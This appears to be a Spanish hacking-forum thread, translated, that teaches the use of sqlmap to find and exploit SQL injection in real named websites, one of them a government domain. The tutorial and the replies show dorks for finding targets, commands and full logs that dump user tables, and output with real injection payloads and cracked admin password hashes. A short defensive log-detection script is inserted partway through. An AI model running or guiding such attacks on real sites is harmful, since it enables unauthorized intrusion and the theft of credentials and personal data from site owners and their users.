cd /pentest/database/sqlmap/
allinurl: /news.php?id=
allinurl: /article.php?id=
allinurl: /noticia.php?id=
http://www.sitioweb.com/news.php?id=543'
./sqlmap.py -u http://www.sitio-web.com/news.php?id=543 --dbs
available databases [2]:
information_schema
connectdb
./sqlmap.py -u http://www.sitio-web.com/news.php?id=543 -D aquívaladb --tables
Database: connectdb
[20 tables]
+---------------------+
| connect_cargos      |
| connect_ciudades    |
| connect_contacto    |
| connect_contenido   |
| connect_contratista |
| connect_documentos  |
| connect_ds          |
| connect_empleo      |
| connect_enlaces     |
| connect_errores     |
| connect_estados     |
| connect_extras      |
| connect_log         |
| connect_media       |
| connect_rextras     |
| connect_rsecciones  |
| connect_rtagcloud   |
| connect_secciones   |
| connect_tagcloud    |
| connect_usuarios    |
+---------------------+
./sqlmap.py -u http://www.sitio-web.com/news.php?id=543 -D aquívaladb -T aquívalatabladeusuarios --columns
Database: connectdb
Table: connect_usuarios
[9 columns]
+-----------------------+-----------------+
| Column                | Type            |
+-----------------------+-----------------+
| apellido_usuarios     | varchar(45)     |
| clave_usuarios        | varchar(40)     |
| email_usuarios        | varchar(255)    |
| id_usuarios           | int(2) unsigned |
| institucion_usuarios  | varchar(45)     |
| nombre_usuarios       | varchar(45)     |
| permisos_usuarios     | tinyint(4)      |
| telf_usuarios         | int(11)         |
| ultimoacceso_usuarios | datetime        |
+-----------------------+-----------------+
./sqlmap.py -u http://www.sitio-web.com/news.php?id=543 -D aquívaladb -T aquívalatabladeusuarios --dump
./sqlmap.py -u http://www.fonep.gob.ve/noticias.php?id=195 -D aquivaladb -T aquívalatabladeusuarios -C "clave_usuarios,email_usuarios,id_usuarios,nombre_usuarios" --dump
Database: connectdb
Table: connect_usuarios
[3 entries]
+-----------------+-------------------+-------------+-----------------+
| clave_usuarios  | email_usuarios    | id_usuarios | nombre_usuarios |
+-----------------+-------------------+-------------+-----------------+
| Olivo           | [email protected] | 1           | ernesto         |
| Gimenez         | [email protected] | 4           | lugimenez       |
| Gonzalez Aviles | [email protected] | 11          | gonzal          |
+-----------------+-------------------+-------------+-----------------+
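Seen from the defender's side, the probing sequence above leaves a recognisable trace in the web server's access log. The following is an added example, not code from the original post: it decodes each request URL and flags the boolean-based blind, time-based blind, UNION and error-based payload shapes that sqlmap reported in this thread, plus sqlmap's default User-Agent; the log lines are constructed samples, not a real capture.

```python
import re
from urllib.parse import unquote_plus

# Payload shapes sqlmap reported in this thread: boolean-based blind
# (id=3 AND 8196=8196), time-based blind (AND SLEEP(5)), UNION query
# (UNION ALL SELECT NULL,...) and error-based (FLOOR(RAND(0)*2)).
SIGNATURES = {
    "boolean_blind": re.compile(r"\bAND\s+(\d+)=\1\b", re.I),
    "time_blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "union_query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "error_based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
}

# Apache combined-format line: client, timestamp, request, status, size, referer, UA.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d+) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Constructed sample lines (not a real capture) imitating sqlmap probing news.php?id=.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Nov/2013:09:25:16 +0000] "GET /news.php?id=543 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Nov/2013:09:25:17 +0000] "GET /news.php?id=543%20AND%208196%3D8196 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.5 - - [18/Nov/2013:09:25:18 +0000] "GET /news.php?id=543%20AND%20SLEEP%285%29 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.5 - - [18/Nov/2013:09:25:19 +0000] "GET /news.php?id=543%20LIMIT%201,1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x3a,0x3a)%23 HTTP/1.1" 200 4096 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
198.51.100.7 - - [18/Nov/2013:09:26:00 +0000] "GET /article.php?id=12 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

def match_signatures(url):
    """Names of the payload signatures found in an already URL-decoded request."""
    return [name for name, rx in SIGNATURES.items() if rx.search(url)]

def classify(line):
    """Parse one log line; return None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = unquote_plus(m.group("path"))  # decode %20, %3D, %28 ... before matching
    hits = match_signatures(path)
    if "sqlmap" in m.group("ua").lower():  # default UA, trivially changed by an attacker
        hits.append("sqlmap_user_agent")
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": path, "hits": hits}

def scan(log_text):
    """Return the decoded requests that triggered at least one signature."""
    return [rec for rec in map(classify, log_text.splitlines())
            if rec and rec["hits"]]

if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(rec["ip"], rec["ts"], rec["hits"], rec["path"])
```

Payload encoding and the User-Agent are under the attacker's control, so these are starting signatures rather than proof of exploitation; what confirms or rules out the finding is how the application builds the query from the id parameter, and the durable fix is a parameterised query rather than string concatenation.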
Excellent tutorial, but look, at the first step I already ran into a problem. The page is vulnerable; this is what I did. Do you know what's happening?

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u www.cideko.com/pro_con.php?id=3 --dbs

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

starting at 09:25:14

[09:25:14] [INFO] resuming back-end DBMS 'mysql'
[09:25:15] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 8196=8196
---
[09:25:16] [INFO] the back-end DBMS is MySQL
web application technology: PHP 4.4.9, Apache
back-end DBMS: MySQL 3
[09:25:16] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database
[09:25:16] [INFO] fetching number of databases
[09:25:17] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:25:17] [INFO] retrieved:
[09:25:17] [INFO] heuristics detected web page charset 'ascii'
[09:25:19] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
[09:25:19] [ERROR] unable to retrieve the number of databases
[09:25:19] [INFO] falling back to current database
[09:25:19] [INFO] fetching current database
[09:25:19] [INFO] retrieved:
[09:25:23] [CRITICAL] unable to retrieve the database names

shutting down at 09:25:23

root@bt:/pentest/database/sqlmap#
Quote from: noopynoob on November 18, 2013, 03:34:40 pm
Excellent tutorial, but look, at the first step I already ran into a problem. The page is vulnerable; this is what I did. Do you know what's happening?

Hi noopynoob, honestly I don't know what the error is, but from the little I've been able to read it is probably either that your sqlmap is not properly configured and/or installed, or that that website throws an error. Please try another site, for example: "www.calidus.ro/en/news.php?id=2". If you get more errors, please tell me...

Regards, Jeremy López.
root@bt:~# cd /pentest/database/sqlmap
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u www.cideko.com/pro_con.php?id=3 --dbs

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

starting at 21:00:46

[21:00:47] [INFO] testing connection to the target url
[21:00:49] [INFO] testing if the url is stable, wait a few seconds
[21:00:51] [INFO] url is stable
[21:00:51] [INFO] testing if GET parameter 'id' is dynamic
[21:00:52] [INFO] confirming that GET parameter 'id' is dynamic
[21:00:54] [WARNING] GET parameter 'id' appears to be not dynamic
[21:00:54] [INFO] testing for SQL injection on GET parameter 'id'
[21:00:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:00:54] [INFO] heuristics detected web page charset 'ascii'
[21:00:54] [WARNING] reflective value(s) found and filtering out
[21:00:59] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[21:00:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[21:00:59] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:01:00] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[21:01:01] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[21:01:02] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:01:02] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[21:01:03] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[21:01:04] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[21:01:04] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[21:01:05] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[21:01:06] [INFO] testing 'Oracle AND time-based blind'
[21:01:07] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[21:01:07] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
[21:01:09] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[21:01:18] [INFO] target url appears to have 36 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[21:11:48] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. --dbms=mysql)
[21:11:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[21:11:48] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using the --dbms option
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[21:19:42] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 318 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 6607=6607
---
[21:35:13] [INFO] testing MySQL
[21:35:14] [INFO] confirming MySQL
[21:35:18] [INFO] the back-end DBMS is MySQL
web application technology: PHP 4.4.9, Apache
back-end DBMS: MySQL < 4.0.0
[21:35:18] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database
[21:35:18] [INFO] fetching number of databases
[21:35:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[21:35:18] [INFO] retrieved:
[21:35:20] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
[21:35:20] [ERROR] unable to retrieve the number of databases
[21:35:20] [INFO] falling back to current database
[21:35:20] [INFO] fetching current database
[21:35:20] [INFO] retrieved:
[21:35:25] [CRITICAL] unable to retrieve the database names

shutting down at 21:35:25

root@bt:/pentest/database/sqlmap#
Greetings! I tried the page you told me about and it does indeed work! Thanks for that, look:

available databases [1]:
information_schema
calidus_calidussql

Database: calidus_calidussql
[50 tables]
+-------------------+
| about             |
| about_de          |
| about_en          |
| categories        |
| categories_de     |
| categories_en     |
| contact           |
| contact_de        |
| contact_en        |
| customers         |
| eco               |
| eco_de            |
| eco_en            |
| faq               |
| faq_de            |
| faq_en            |
| forum_answer      |
| forum_question    |
| galleries         |
| gallery           |
| gallery_de        |
| gallery_en        |
| gallery_images    |
| imp               |
| mission           |
| mission_de        |
| mission_en        |
| news              |
| news_de           |
| news_en           |
| pellets           |
| pellets_de        |
| pellets_en        |
| prices            |
| products          |
| products_de       |
| products_en       |
| projects          |
| projects_de       |
| projects_en       |
| special_offers    |
| special_offers_de |
| special_offers_en |
| support           |
| support_de        |
| support_en        |
| users             |
| vizion            |
| vizion_de         |
| vizion_en         |
+-------------------+

Database: calidus_calidussql
Table: users
[2 columns]
+---------------+-------------+
| Column        | Type        |
+---------------+-------------+
| username      | int(11)     |
| user_password | varchar(20) |
+---------------+-------------+

Database: calidus_calidussql
Table: users
[3 entries]
+-----------------------+
| user_name             |
+-----------------------+
| 1) admin <- [ADMIN]   |
| 2) miladro <- [USER]  |
| 3) dexmod <- [ADMIN]  |
+-----------------------+

Database: calidus_calidussql
Table: users
[3 entries]
+---------------+
| user_password |
+---------------+
| 1) root       |
| 2) marjan     |
| 3) DexmoD     |
+---------------+

My log:

root@bt:~# cd ../pentest/database/sqlmap
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u www.calidus.ro/en/news.php?id=2 -D calidus_calidussql -T users -C "user_email,user_id,username,user_password" --dump

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

starting at 08:59:49

[08:59:50] [INFO] resuming back-end DBMS 'mysql'
[09:00:10] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2 AND 4448=4448

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=2 AND (SELECT 8489 FROM(SELECT COUNT(*),CONCAT(0x3a68717a3a,(SELECT (CASE WHEN (8489=8489) THEN 1 ELSE 0 END)),0x3a6c6c733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: id=2 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a68717a3a,0x696a6b474d444c775164,0x3a6c6c733a)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=2 AND SLEEP(5)
---
[09:00:31] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.4.20
back-end DBMS: MySQL 5.0
do you want sqlmap to consider provided column(s):
[1] as LIKE column names (default)
[2] as exact column names
> 2
[09:00:41] [INFO] fetching columns 'user_email, user_id, user_password, username' for table 'users' in database 'calidus_calidussql'
[09:00:42] [WARNING] reflective value(s) found and filtering out
[09:00:42] [INFO] fetching entries of column(s) 'user_email, user_id, user_password, username' for table 'users' in database 'calidus_calidussql'
[09:00:43] [INFO] analyzing table dump for possible password hashes
recognized possible password hashes in column 'user_password'. Do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[09:00:48] [INFO] using hash method 'md5_generic_passwd'
[09:00:48] [INFO] resuming password 'root' for hash '63a9f0ea7bb98050796b649e85481845' for user 'admin'
[09:00:48] [INFO] resuming password 'marjan' for hash '122f961db675f6a45b998594471a990b' for user 'miladro'
what dictionary do you want to use?
[1] default dictionary file '/pentest/database/sqlmap/txt/wordlist.txt' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[09:00:52] [INFO] using default dictionary
[09:00:52] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[09:00:56] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[09:02:13] [INFO] using suffix '1'
[09:02:32] [INFO] current status: a910u... |^C
[09:02:32] [WARNING] user aborted during dictionary-based attack phase (Ctrl+C was pressed)
[09:02:32] [INFO] writing uncracked hashes to file '/tmp/tmpdPz1cV.txt' for eventual further processing
[09:02:32] [INFO] postprocessing table dump
Database: calidus_calidussql
Table: users
[3 entries]
+---------+----------+-------------------+-------------------------------------------+
| user_id | username | user_email        | user_password                             |
+---------+----------+-------------------+-------------------------------------------+
| 1       | dexmod   | [email protected] | a0dbde9503e13437db0f854b0b72a73b          |
| 8       | admin    | <blank>           | 63a9f0ea7bb98050796b649e85481845 (root)   |
| 6       | miladro  | [email protected] | 122f961db675f6a45b998594471a990b (marjan) |
+---------+----------+-------------------+-------------------------------------------+
[09:02:32] [INFO] table 'calidus_calidussql.users' dumped to CSV file '/pentest/database/sqlmap/output/www.calidus.ro/dump/calidus_calidussql/users.csv'
[09:02:33] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.calidus.ro'

shutting down at 09:02:32

root@bt:/pentest/database/sqlmap#

The administrators' username and password are clear, but when I try to log in as one, look:

I don't want to do anything malicious, I just want to know why this happens. Look, here is another vulnerable website, but the problem is that when I dumped the database about 1000 tables came out and I'm lost: http://www.futuresfins.com/fin-detail.php?id=173

Thanks